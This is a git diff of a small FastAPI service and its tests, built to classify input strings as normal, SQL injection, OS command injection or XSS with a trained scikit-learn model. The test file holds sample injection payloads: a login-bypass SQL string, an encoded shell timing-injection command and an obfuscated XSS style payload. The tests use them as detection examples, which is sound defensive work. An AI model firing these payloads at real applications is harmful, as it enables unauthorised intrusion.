icu=73.1=h6a678d5_0 + - idna=3.4=py311h06a4308_0 + - imagecodecs=2023.1.23=py311h8105a5c_0 + - imageio=2.31.4=py311h06a4308_0 + - imagesize=1.4.1=py311h06a4308_0 + - imbalanced-learn=0.11.0=py311h06a4308_1 + - importlib-metadata=7.0.1=py311h06a4308_0 + - importlib_metadata=7.0.1=hd3eb1b0_0 + - incremental=21.3.0=pyhd3eb1b0_0 + - inflection=0.5.1=py311h06a4308_0 + - iniconfig=1.1.1=pyhd3eb1b0_0 + - intake=0.6.8=py311h06a4308_0 + - intel-openmp=2023.1.0=hdb19cb5_46306 + - intervaltree=3.1.0=pyhd3eb1b0_0 + - ipykernel=6.25.0=py311h92b7b1e_0 + - ipython=8.20.0=py311h06a4308_0 + - ipython_genutils=0.2.0=pyhd3eb1b0_1 + - ipywidgets=8.0.4=py311h06a4308_0 + - isort=5.9.3=pyhd3eb1b0_0 + - itemadapter=0.3.0=pyhd3eb1b0_0 + - itemloaders=1.0.4=pyhd3eb1b0_1 + - itsdangerous=2.0.1=pyhd3eb1b0_0 + - jaraco.classes=3.2.1=pyhd3eb1b0_0 + - jedi=0.18.1=py311h06a4308_1 + - jeepney=0.7.1=pyhd3eb1b0_0 + - jellyfish=1.0.1=py311hb02cf49_0 + - jinja2=3.1.2=py311h06a4308_0 + - jmespath=1.0.1=py311h06a4308_0 + - joblib=1.2.0=py311h06a4308_0 + - jpeg=9e=h5eee18b_1 + - jq=1.6=h27cfd23_1000 + - json5=0.9.6=pyhd3eb1b0_0 + - jsonpatch=1.32=pyhd3eb1b0_0 + - jsonpointer=2.1=pyhd3eb1b0_0 + - jsonschema=4.19.2=py311h06a4308_0 + - jsonschema-specifications=2023.7.1=py311h06a4308_0 + - jupyter=1.0.0=py311h06a4308_8 + - jupyter-lsp=2.2.0=py311h06a4308_0 + - jupyter_client=8.6.0=py311h06a4308_0 + - jupyter_console=6.6.3=py311h06a4308_0 + - jupyter_core=5.5.0=py311h06a4308_0 + - jupyter_events=0.8.0=py311h06a4308_0 + - jupyter_server=2.10.0=py311h06a4308_0 + - jupyter_server_terminals=0.4.4=py311h06a4308_1 + - jupyterlab=4.0.8=py311h06a4308_0 + - jupyterlab_pygments=0.1.2=py_0 + - jupyterlab_server=2.25.1=py311h06a4308_0 + - jupyterlab_widgets=3.0.9=py311h06a4308_0 + - jxrlib=1.1=h7b6447c_2 + - kaleido-core=0.2.1=h7c8854e_0 + - keyring=23.13.1=py311h06a4308_0 + - kiwisolver=1.4.4=py311h6a678d5_0 + - krb5=1.20.1=h143b758_1 + - lazy-object-proxy=1.6.0=py311h5eee18b_0 + - lazy_loader=0.3=py311h06a4308_0 + - lcms2=2.12=h3be6417_0 + - ld_impl_linux-64=2.38=h1181459_1 + - lerc=3.0=h295c915_0 + - libaec=1.0.4=he6710b0_1 + - libarchive=3.6.2=h6ac8c49_2 + - libavif=0.11.1=h5eee18b_0 + - libboost=1.82.0=h109eef0_2 + - libbrotlicommon=1.0.9=h5eee18b_7 + - libbrotlidec=1.0.9=h5eee18b_7 + - libbrotlienc=1.0.9=h5eee18b_7 + - libclang=14.0.6=default_hc6dbbc7_1 + - libclang13=14.0.6=default_he11475f_1 + - libcups=2.4.2=h2d74bed_1 + - libcurl=8.5.0=h251f7ec_0 + - libdeflate=1.17=h5eee18b_1 + - libedit=3.1.20230828=h5eee18b_0 + - libev=4.33=h7f8727e_1 + - libevent=2.1.12=hdbd6064_1 + - libffi=3.4.4=h6a678d5_0 + - libgcc-ng=11.2.0=h1234567_1 + - libgfortran-ng=11.2.0=h00389a5_1 + - libgfortran5=11.2.0=h1234567_1 + - libgomp=11.2.0=h1234567_1 + - liblief=0.12.3=h6a678d5_0 + - libllvm14=14.0.6=hdb19cb5_3 + - libmamba=1.5.6=haf1ee3a_0 + - libmambapy=1.5.6=py311h2dafd23_0 + - libnghttp2=1.57.0=h2d74bed_0 + - libpng=1.6.39=h5eee18b_0 + - libpq=12.15=hdbd6064_1 + - libprotobuf=3.20.3=he621ea3_0 + - libsodium=1.0.18=h7b6447c_0 + - libsolv=0.7.24=he621ea3_0 + - libspatialindex=1.9.3=h2531618_0 + - libssh2=1.10.0=hdbd6064_2 + - libstdcxx-ng=11.2.0=h1234567_1 + - libthrift=0.15.0=h1795dd8_2 + - libtiff=4.5.1=h6a678d5_0 + - libuuid=1.41.5=h5eee18b_0 + - libwebp=1.3.2=h11a3e52_0 + - libwebp-base=1.3.2=h5eee18b_0 + - libxcb=1.15=h7f8727e_0 + - libxkbcommon=1.0.1=h5eee18b_1 + - libxml2=2.10.4=hf1b16e4_1 + - libxslt=1.1.37=h5eee18b_1 + - libzopfli=1.0.3=he6710b0_0 + - linkify-it-py=2.0.0=py311h06a4308_0 + - llvmlite=0.41.0=py311he621ea3_0 + - locket=1.0.0=py311h06a4308_0 + - lxml=4.9.3=py311hdbbb534_0 + - lz4=4.3.2=py311h5eee18b_0 + - lz4-c=1.9.4=h6a678d5_0 + - lzo=2.10=h7b6447c_2 + - markdown=3.4.1=py311h06a4308_0 + - markdown-it-py=2.2.0=py311h06a4308_1 + - markupsafe=2.1.3=py311h5eee18b_0 + - mathjax=2.7.5=h06a4308_0 + - matplotlib=3.8.0=py311h06a4308_0 + - matplotlib-base=3.8.0=py311ha02d727_0 + - matplotlib-inline=0.1.6=py311h06a4308_0 + - mccabe=0.7.0=pyhd3eb1b0_0 + - mdit-py-plugins=0.3.0=py311h06a4308_0 + - mdurl=0.1.0=py311h06a4308_0 + - menuinst=2.0.1=py311h06a4308_1 + - mistune=2.0.4=py311h06a4308_0 + - mkl=2023.1.0=h213fc3f_46344 + - mkl-service=2.4.0=py311h5eee18b_1 + - mkl_fft=1.3.8=py311h5eee18b_0 + - mkl_random=1.2.4=py311hdb19cb5_0 + - more-itertools=10.1.0=py311h06a4308_0 + - mpc=1.1.0=h10f8cd9_1 + - mpfr=4.0.2=hb69a4c5_1 + - mpi=1.0=mpich + - mpich=4.1.1=hbae89fd_0 + - mpmath=1.3.0=py311h06a4308_0 + - msgpack-python=1.0.3=py311hdb19cb5_0 + - multidict=6.0.4=py311h5eee18b_0 + - multipledispatch=0.6.0=py311h06a4308_0 + - multiprocess=0.70.14=py311h06a4308_0 + - munkres=1.1.4=py_0 + - mypy_extensions=1.0.0=py311h06a4308_0 + - mysql=5.7.24=h721c034_2 + - navigator-updater=0.4.0=py311h06a4308_1 + - nbclient=0.8.0=py311h06a4308_0 + - nbconvert=7.10.0=py311h06a4308_0 + - nbformat=5.9.2=py311h06a4308_0 + - ncurses=6.4=h6a678d5_0 + - nest-asyncio=1.5.6=py311h06a4308_0 + - networkx=3.1=py311h06a4308_0 + - nltk=3.8.1=py311h06a4308_0 + - notebook=7.0.6=py311h06a4308_0 + - notebook-shim=0.2.3=py311h06a4308_0 + - nspr=4.35=h6a678d5_0 + - nss=3.89.1=h6a678d5_0 + - numba=0.58.1=py311ha02d727_0 + - numexpr=2.8.7=py311h65dcdc2_0 + - numpy=1.26.3=py311h08b1b3b_0 + - numpy-base=1.26.3=py311hf175353_0 + - numpydoc=1.5.0=py311h06a4308_0 + - oniguruma=6.9.7.1=h27cfd23_0 + - openjpeg=2.4.0=h3ad879b_0 + - openpyxl=3.0.10=py311h5eee18b_0 + - openssl=3.0.12=h7f8727e_0 + - orc=1.7.4=hb3bc3d3_1 + - overrides=7.4.0=py311h06a4308_0 + - packaging=23.1=py311h06a4308_0 + - pandas=2.1.4=py311ha02d727_0 + - pandocfilters=1.5.0=pyhd3eb1b0_0 + - panel=1.3.1=py311h06a4308_0 + - param=2.0.1=py311h06a4308_0 + - parsel=1.6.0=py311h06a4308_0 + - parso=0.8.3=pyhd3eb1b0_0 + - partd=1.4.1=py311h06a4308_0 + - patch=2.7.6=h7b6447c_1001 + - patchelf=0.17.2=h6a678d5_0 + - pathlib=1.0.1=pyhd3eb1b0_1 + - pathspec=0.10.3=py311h06a4308_0 + - patsy=0.5.3=py311h06a4308_0 + - pcre=8.45=h295c915_0 + - pcre2=10.42=hebb0a14_0 + - pep8=1.7.1=py311h06a4308_1 + - pexpect=4.8.0=pyhd3eb1b0_3 + - pickleshare=0.7.5=pyhd3eb1b0_1003 + - pillow=10.0.1=py311ha6cbd5a_0 + - pip=23.2.1=py311h06a4308_0 + - pkce=1.0.3=py311h06a4308_0 + - pkginfo=1.9.6=py311h06a4308_0 + - platformdirs=3.10.0=py311h06a4308_0 + - plotly=5.9.0=py311h06a4308_0 + - pluggy=1.0.0=py311h06a4308_1 + - ply=3.11=py311h06a4308_0 + - prometheus_client=0.14.1=py311h06a4308_0 + - prompt-toolkit=3.0.43=py311h06a4308_0 + - prompt_toolkit=3.0.43=hd3eb1b0_0 + - protego=0.1.16=py_0 + - psutil=5.9.0=py311h5eee18b_0 + - ptyprocess=0.7.0=pyhd3eb1b0_2 + - pure_eval=0.2.2=pyhd3eb1b0_0 + - py-cpuinfo=9.0.0=py311h06a4308_0 + - py-lief=0.12.3=py311h6a678d5_0 + - pyarrow=11.0.0=py311hd8e8d9b_1 + - pyasn1=0.4.8=pyhd3eb1b0_0 + - pyasn1-modules=0.2.8=py_0 + - pybind11-abi=4=hd3eb1b0_1 + - pycodestyle=2.10.0=py311h06a4308_0 + - pycosat=0.6.6=py311h5eee18b_0 + - pycparser=2.21=pyhd3eb1b0_0 + - pyct=0.5.0=py311h06a4308_0 + - pycurl=7.45.2=py311hdbd6064_1 + - pydantic=1.10.12=py311h5eee18b_1 + - pydispatcher=2.0.5=py311h06a4308_2 + - pydocstyle=6.3.0=py311h06a4308_0 + - pyerfa=2.0.0=py311h5eee18b_0 + - pyflakes=3.0.1=py311h06a4308_0 + - pygments=2.15.1=py311h06a4308_1 + - pyjwt=2.4.0=py311h06a4308_0 + - pylint=2.16.2=py311h06a4308_0 + - pylint-venv=2.3.0=py311h06a4308_0 + - pyls-spyder=0.4.0=pyhd3eb1b0_0 + - pyodbc=4.0.39=py311h6a678d5_0 + - pyopenssl=23.2.0=py311h06a4308_0 + - pyparsing=3.0.9=py311h06a4308_0 + - pyqt=5.15.10=py311h6a678d5_0 + - pyqt5-sip=12.13.0=py311h5eee18b_0 + - pyqtwebengine=5.15.10=py311h6a678d5_0 + - pysocks=1.7.1=py311h06a4308_0 + - pytables=3.8.0=py311hb8ae3fc_3 + - pytest=7.4.0=py311h06a4308_0 + - python=3.11.5=h955ad1f_0 + - python-dateutil=2.8.2=pyhd3eb1b0_0 + - python-dotenv=0.21.0=py311h06a4308_0 + - python-fastjsonschema=2.16.2=py311h06a4308_0 + - python-json-logger=2.0.7=py311h06a4308_0 + - python-kaleido=0.2.1=py311h06a4308_0 + - python-libarchive-c=2.9=pyhd3eb1b0_1 + - python-lmdb=1.4.1=py311h6a678d5_0 + - python-lsp-black=1.2.1=py311h06a4308_0 + - python-lsp-jsonrpc=1.0.0=pyhd3eb1b0_0 + - python-lsp-server=1.7.2=py311h06a4308_0 + - python-slugify=5.0.2=pyhd3eb1b0_0 + - python-snappy=0.6.1=py311h6a678d5_0 + - python-tzdata=2023.3=pyhd3eb1b0_0 + - python-xxhash=2.0.2=py311h5eee18b_1 + - pytoolconfig=1.2.6=py311h06a4308_0 + - pytz=2023.3.post1=py311h06a4308_0 + - pyviz_comms=3.0.0=py311h06a4308_0 + - pywavelets=1.5.0=py311hf4808d0_0 + - pyxdg=0.27=pyhd3eb1b0_0 + - pyyaml=6.0.1=py311h5eee18b_0 + - pyzmq=25.1.0=py311h6a678d5_0 + - qdarkstyle=3.0.2=pyhd3eb1b0_0 + - qstylizer=0.2.2=py311h06a4308_0 + - qt-main=5.15.2=h53bd1ea_10 + - qt-webengine=5.15.9=h9ab4d14_7 + - qtawesome=1.2.2=py311h06a4308_0 + - qtconsole=5.4.2=py311h06a4308_0 + - qtpy=2.4.1=py311h06a4308_0 + - queuelib=1.6.2=py311h06a4308_0 + - re2=2022.04.01=h295c915_0 + - readline=8.2=h5eee18b_0 + - referencing=0.30.2=py311h06a4308_0 + - regex=2023.10.3=py311h5eee18b_0 + - reproc=14.2.4=h295c915_1 + - reproc-cpp=14.2.4=h295c915_1 + - requests=2.31.0=py311h06a4308_0 + - requests-file=1.5.1=pyhd3eb1b0_0 + - requests-toolbelt=1.0.0=py311h06a4308_0 + - responses=0.13.3=pyhd3eb1b0_0 + - rfc3339-validator=0.1.4=py311h06a4308_0 + - rfc3986=1.4.0=pyhd3eb1b0_0 + - rfc3986-validator=0.1.1=py311h06a4308_0 + - rich=13.3.5=py311h06a4308_0 + - rope=1.7.0=py311h06a4308_0 + - rpds-py=0.10.6=py311hb02cf49_0 + - rtree=1.0.1=py311h06a4308_0 + - ruamel.yaml=0.17.21=py311h5eee18b_0 + - ruamel_yaml=0.17.21=py311h5eee18b_0 + - s3fs=2023.10.0=py311h06a4308_0 + - safetensors=0.4.0=py311h24d97f6_0 + - scikit-image=0.20.0=py311h6a678d5_0 + - scikit-learn=1.2.2=py311h6a678d5_1 + - scikit-learn-intelex=2023.1.1=py311h06a4308_0 + - scipy=1.11.4=py311h08b1b3b_0 + - scrapy=2.8.0=py311h06a4308_0 + - seaborn=0.12.2=py311h06a4308_0 + - secretstorage=3.3.1=py311h06a4308_1 + - semver=2.13.0=pyhd3eb1b0_0 + - send2trash=1.8.2=py311h06a4308_0 + - service_identity=18.1.0=pyhd3eb1b0_1 + - setuptools=68.0.0=py311h06a4308_0 + - sip=6.7.12=py311h6a678d5_0 + - six=1.16.0=pyhd3eb1b0_1 + - smart_open=5.2.1=py311h06a4308_0 + - snappy=1.1.10=h6a678d5_1 + - sniffio=1.2.0=py311h06a4308_1 + - snowballstemmer=2.2.0=pyhd3eb1b0_0 + - sortedcontainers=2.4.0=pyhd3eb1b0_0 + - soupsieve=2.5=py311h06a4308_0 + - sphinx=5.0.2=py311h06a4308_0 + - sphinxcontrib-applehelp=1.0.2=pyhd3eb1b0_0 + - sphinxcontrib-devhelp=1.0.2=pyhd3eb1b0_0 + - sphinxcontrib-htmlhelp=2.0.0=pyhd3eb1b0_0 + - sphinxcontrib-jsmath=1.0.1=pyhd3eb1b0_0 + - sphinxcontrib-qthelp=1.0.3=pyhd3eb1b0_0 + - sphinxcontrib-serializinghtml=1.1.5=pyhd3eb1b0_0 + - spyder=5.4.3=py311h06a4308_1 + - spyder-kernels=2.4.4=py311h06a4308_0 + - sqlalchemy=2.0.25=py311h5eee18b_0 + - sqlite=3.41.2=h5eee18b_0 + - stack_data=0.2.0=pyhd3eb1b0_0 + - starlette=0.27.0=py311h06a4308_0 + - statsmodels=0.14.0=py311hf4808d0_0 + - sympy=1.12=py311h06a4308_0 + - tabulate=0.9.0=py311h06a4308_0 + - tbb=2021.8.0=hdb19cb5_0 + - tbb4py=2021.8.0=py311hdb19cb5_0 + - tblib=1.7.0=pyhd3eb1b0_0 + - tenacity=8.2.2=py311h06a4308_0 + - terminado=0.17.1=py311h06a4308_0 + - text-unidecode=1.3=pyhd3eb1b0_0 + - textdistance=4.2.1=pyhd3eb1b0_0 + - threadpoolctl=2.2.0=pyh0d69192_0 + - three-merge=0.1.1=pyhd3eb1b0_0 + - tifffile=2023.4.12=py311h06a4308_0 + - tinycss2=1.2.1=py311h06a4308_0 + - tk=8.6.12=h1ccaba5_0 + - tldextract=3.2.0=pyhd3eb1b0_0 + - tokenizers=0.13.3=py311h22610ee_0 + - toml=0.10.2=pyhd3eb1b0_0 + - tomlkit=0.11.1=py311h06a4308_0 + - toolz=0.12.0=py311h06a4308_0 + - tornado=6.3.3=py311h5eee18b_0 + - tqdm=4.65.0=py311h92b7b1e_0 + - traitlets=5.7.1=py311h06a4308_0 + - transformers=4.32.1=py311h06a4308_0 + - truststore=0.8.0=py311h06a4308_0 + - twisted=22.10.0=py311h5eee18b_0 + - typing-extensions=4.9.0=pyhd3eb1b0_0 + - typing_extensions=4.9.0=py311h06a4308_0 + - tzdata=2023d=h04d1e81_0 + - uc-micro-py=1.0.1=py311h06a4308_0 + - ujson=5.4.0=py311h6a678d5_0 + - unidecode=1.2.0=pyhd3eb1b0_0 + - unixodbc=2.3.11=h5eee18b_0 + - urllib3=1.26.18=py311h06a4308_0 + - utf8proc=2.6.1=h27cfd23_0 + - uvicorn=0.20.0=py311h06a4308_0 + - w3lib=1.21.0=pyhd3eb1b0_0 + - watchdog=2.1.6=py311h06a4308_0 + - wcwidth=0.2.5=pyhd3eb1b0_0 + - webencodings=0.5.1=py311h06a4308_1 + - websocket-client=0.58.0=py311h06a4308_4 + - werkzeug=2.2.3=py311h06a4308_0 + - whatthepatch=1.0.2=py311h06a4308_0 + - wheel=0.38.4=py311h06a4308_0 + - widgetsnbextension=4.0.5=py311h06a4308_0 + - wrapt=1.14.1=py311h5eee18b_0 + - wurlitzer=3.0.2=py311h06a4308_0 + - xarray=2023.6.0=py311h06a4308_0 + - xxhash=0.8.0=h7f8727e_3 + - xyzservices=2022.9.0=py311h06a4308_1 + - xz=5.4.5=h5eee18b_0 + - yaml=0.2.5=h7b6447c_0 + - yaml-cpp=0.8.0=h6a678d5_0 + - yapf=0.31.0=pyhd3eb1b0_0 + - yarl=1.9.3=py311h5eee18b_0 + - zeromq=4.3.4=h2531618_0 + - zfp=1.0.0=h6a678d5_0 + - zict=3.0.0=py311h06a4308_0 + - zipp=3.17.0=py311h06a4308_0 + - zlib=1.2.13=h5eee18b_0 + - zlib-ng=2.0.7=h5eee18b_0 + - zope=1.0=py311h06a4308_1 + - zope.interface=5.4.0=py311h5eee18b_0 + - zstandard=0.19.0=py311h5eee18b_0 + - zstd=1.5.5=hc292b87_0 + - pip: + - dumper==1.2.0 + - faker==22.0.0 +prefix: /home/bro/anaconda3 diff --git a/main.py b/main.py new file mode 100644 index 0000000..f74483e --- /dev/null +++ b/main.py @@ -0,0 +1,28 @@ +import joblib +from typing import Union +from fastapi import FastAPI +from pydantic import BaseModel + +class Item(BaseModel): + value: str + +app = FastAPI() + +@app.get("/") +async def read_main(): + return {"msg": "Welcome in simple web application that provides prediction whether the sent data is an attack attempt or not. Use /detect/ endpoints with GET or POST methods - POST endpoint awaits for simple json with value assigned to 'value' key :) "} + +@app.get("/detect/{value}") +async def detect_input_get(value: Union[str]): + nb_saved = joblib.load("nb.joblib") + vec_saved = joblib.load("vec.joblib") + + return {"prediction": str(nb_saved.predict(vec_saved.transform([value])))} + +@app.post("/detect/") +async def detect_input_post(item: Item): + nb_saved = joblib.load("nb.joblib") + vec_saved = joblib.load("vec.joblib") + + return {"prediction": str(nb_saved.predict(vec_saved.transform([item.value])))} + diff --git a/nb.joblib b/nb.joblib new file mode 100644 index 0000000..007b832 Binary files /dev/null and b/nb.joblib differ diff --git a/test_main.py b/test_main.py new file mode 100644 index 0000000..08af2f6 --- /dev/null +++ b/test_main.py @@ -0,0 +1,69 @@ +from fastapi.testclient import TestClient + +from main import app + +client = TestClient(app) + +def test_detect_input_get_normal(): + response = client.get("/detect/normaldata") + assert response.status_code == 200 + assert response.json() == {"prediction": "['normal']"} + +def test_detect_input_post_normal(): + response = client.post( + "/detect/", + json={"value": "normaldata"}, + ) + assert response.status_code == 200 + print(response.json()) + assert response.json() == { + "prediction": "['normal']" + } + +def test_detect_input_get_sqli(): + response = client.get("/detect/admin') or '1'='1'--") + assert response.status_code == 200 + assert response.json() == {"prediction": "['sql-injection']"} + +def test_detect_input_post_sqli(): + response = client.post( + "/detect/", + json={"value": "admin') or '1'='1'--"}, + ) + assert response.status_code == 200 + print(response.json()) + assert response.json() == { + "prediction": "['sql-injection']" + } + +def test_detect_input_get_osi(): + response = client.get("/detect/%22%7C%20%5B%205%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522") + assert response.status_code == 200 + assert response.json() == {"prediction": "['os-command-injection']"} + +def test_detect_input_post_osi(): + response = client.post( + "/detect/", + json={"value": "%22%7C%20%5B%205%20-ne%20%24%28echo%20BLTNIK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522"}, + ) + assert response.status_code == 200 + print(response.json()) + assert response.json() == { + "prediction": "['os-command-injection']" + } + +def test_detect_input_get_xss(): + response = client.get("/detect/<div style=xss:expressio\6e(alert(1))>") + assert response.status_code == 200 + assert response.json() == {"prediction": "['xss']"} + +def test_detect_input_post_xss(): + response = client.post( + "/detect/", + json={"value": "<div style=xss:expressio\6e(alert(1))>"}, + ) + assert response.status_code == 200 + print(response.json()) + assert response.json() == { + "prediction": "['xss']" + } diff --git a/utils/calculate_statistics.py b/utils/calculate_statistics.py new file mode 100755 index 0000000..acb0a9a --- /dev/null +++ b/utils/calculate_statistics.py @@ -0,0 +1,64 @@ +import pandas as pd + +def countPercentOfNumbers(row): + numberOfChars = len(row['value']) + numberOfDigitsInString = sum(c.isdigit() for c in row['value']) + + if (numberOfDigitsInString == 0): + return 0 + else: + return (numberOfDigitsInString/numberOfChars) * 100 + +def countPercentOfLetters(row): + numberOfChars = len(row['value']) + numberOfAlphasInString = sum(c.isalpha() for c in row['value']) + + if (numberOfAlphasInString == 0): + return 0 + else: + return (numberOfAlphasInString/numberOfChars) * 100 + +def countPercentOfSpaces(row): + numberOfChars = len(row['value']) + numberOfSpacesInString = sum(c.isspace() for c in row['value']) + + if (numberOfSpacesInString == 0): + return 0 + else: + return (numberOfSpacesInString / numberOfChars) * 100 + +def countPercentOfSpecials(row): + numberOfChars = len(row['value']) + numberOfDigitsInString = sum(c.isdigit() for c in row['value']) + numberOfAlphasInString = sum(c.isalpha() for c in row['value']) + numberOfSpacesInString = sum(c.isspace() for c in row['value']) + + numberOfSpecials = numberOfChars - numberOfDigitsInString - numberOfAlphasInString - numberOfSpacesInString + + if (numberOfSpecials == 0): + return 0 + else: + return (numberOfSpecials/numberOfChars) * 100 + +df = pd.read_csv('../datasets/out.csv', + usecols=range(2), + lineterminator='\n', + header=None) + +df = df.rename(columns={0: "type", 1: "value"}) + +df['numberOfChars'] = df.apply(lambda row: len(row['value']), axis=1) +print('Mean amount of chars by type') +print(df.groupby(['type'])["numberOfChars"].mean()) +df['percentOfLetters'] = df.apply(countPercentOfLetters, axis=1) +df['percentOfNumbers'] = df.apply(countPercentOfNumbers, axis=1) +df['percentOfSpecialChars'] = df.apply(countPercentOfSpecials, axis=1) +df['percentOfSpaces'] = df.apply(countPercentOfSpaces, axis=1) +print('Mean percent of alphanumeric by type') +print(df.groupby(['type'])["percentOfLetters"].mean()) +print('Mean percent of digits by type') +print(df.groupby(['type'])["percentOfNumbers"].mean()) +print('Mean percent of special characters by type') +print(df.groupby(['type'])["percentOfSpecialChars"].mean()) +print('Mean percent of spaces by type') +print(df.groupby(['type'])["percentOfSpaces"].mean()) \ No newline at end of file diff --git a/utils/csv_generator.py b/utils/csv_generator.py new file mode 100644 index 0000000..43157fe --- /dev/null +++ b/utils/csv_generator.py @@ -0,0 +1,37 @@ +#!/usr/bin/python + +fileOut = open('../datasets/out.csv', 'w') + +file = open('../datasets/regular_web_form_data.txt', 'r') +Lines = file.readlines() + +for line in Lines: + fileOut.write("normal,'" + str(line).strip().replace("\n", "") + "'\n") + +file.close() + +file = open('../datasets/os-command-injection.txt', 'r') +Lines = file.readlines() + +for line in Lines: + fileOut.write("os-command-injection,'" + str(line).strip().replace("\n", "") + "'\n") + +file.close() + +file = open('../datasets/sql-injection.txt', 'r') +Lines = file.readlines() + +for line in Lines: + fileOut.write("sql-injection,'" + str(line).strip().replace("\n", "") + "'\n") + +file.close() + +file = open('../datasets/xss.txt', 'r') +Lines = file.readlines() + +for line in Lines: + fileOut.write("xss,'" + str(line).strip().replace("\n", "") + "'\n") + +file.close() + +fileOut.close() \ No newline at end of file diff --git a/utils/faker_data_generator.py b/utils/faker_data_generator.py new file mode 100644 index 0000000..451c900 --- /dev/null +++ b/utils/faker_data_generator.py @@ -0,0 +1,68 @@ +#!/usr/bin/python + +from faker import Faker + +faker = Faker() + +print(f'name: {faker.name()}') +print(f'address: {faker.address()}') + +print(f'text: {faker.text()}') + +file = open("../datasets/regular_web_form_data.txt", "w") + +Faker.seed(0) + +for _ in range(600): + file.write(faker.ascii_company_email() + "\n") + +for _ in range(600): + file.write(faker.city() + "\n") + +for _ in range(600): + file.write(faker.country() + "\n") + +for _ in range(600): + file.write(faker.postcode() + "\n") + +for _ in range(600): + file.write(faker.street_address() + "\n") + +for _ in range(600): + file.write(faker.iban() + "\n") + +for _ in range(600): + file.write(faker.company() + "\n") + +for _ in range(600): + file.write(faker.credit_card_number() + "\n") + +for _ in range(600): + file.write(str(faker.date_of_birth()) + "\n") + +for _ in range(600): + file.write(faker.domain_name() + "\n") + +for _ in range(600): + file.write(faker.job() + "\n") + +for _ in range(600): + file.write(faker.sentence(nb_words=10) + "\n") + +for _ in range(600): + file.write(faker.passport_number() + "\n") + +for _ in range(600): + file.write(faker.name() + "\n") + +for _ in range(600): + file.write(faker.phone_number() + "\n") + +for _ in range(600): + file.write(faker.ssn() + "\n") + +for _ in range(600): + file.write(faker.user_agent() + "\n") + +file.close() + diff --git a/utils/nb.joblib b/utils/nb.joblib new file mode 100644 index 0000000..ccce560 Binary files /dev/null and b/utils/nb.joblib differ diff --git a/utils/train_model.py b/utils/train_model.py new file mode 100644 index 0000000..212961c --- /dev/null +++ b/utils/train_model.py @@ -0,0 +1,38 @@ +import numpy as np +import pandas as pd +import joblib +import matplotlib.pyplot as plt +from sklearn.feature_extraction.text import CountVectorizer +from sklearn.naive_bayes import MultinomialNB, GaussianNB +from sklearn import svm +from sklearn.model_selection import GridSearchCV + +# Loading the Data - as different payloads got many special chars csv is loaded using predefined amount of cols to avoid problems with delimiter +data = pd.read_csv('../datasets/out.csv', + usecols=range(2), + lineterminator='\n', + header=None) + +y_data=data[0] +x_data=data[1] + +split =(int)(0.8*data.shape[0]) +x_train=x_data[:split] +x_test=x_data[split:] +y_train=y_data[:split] +y_test=y_data[split:] + +# Extracting Features +count_vector = CountVectorizer() +extracted_features = count_vector.fit_transform(x_train) + +# Building and Training the Model +tuned_parameters = {'kernel': ['rbf','linear'], 'gamma': [1e-3, 1e-4],'C': [1, 10, 100, 1000]} +model = GridSearchCV(svm.SVC(), tuned_parameters) +model.fit(extracted_features,y_train) +print("Model Trained Successfully!") + +print("Accuracy of the model is: ",model.score(count_vector.transform(x_test),y_test)*100) + +joblib.dump(model, "nb.joblib") +joblib.dump(count_vector, "vec.joblib") \ No newline at end of file diff --git a/utils/vec.joblib b/utils/vec.joblib new file mode 100644 index 0000000..9ebe154 Binary files /dev/null and b/utils/vec.joblib differ diff --git a/vec.joblib b/vec.joblib new file mode 100644 index 0000000..9ebe154 Binary files /dev/null and b/vec.joblib differ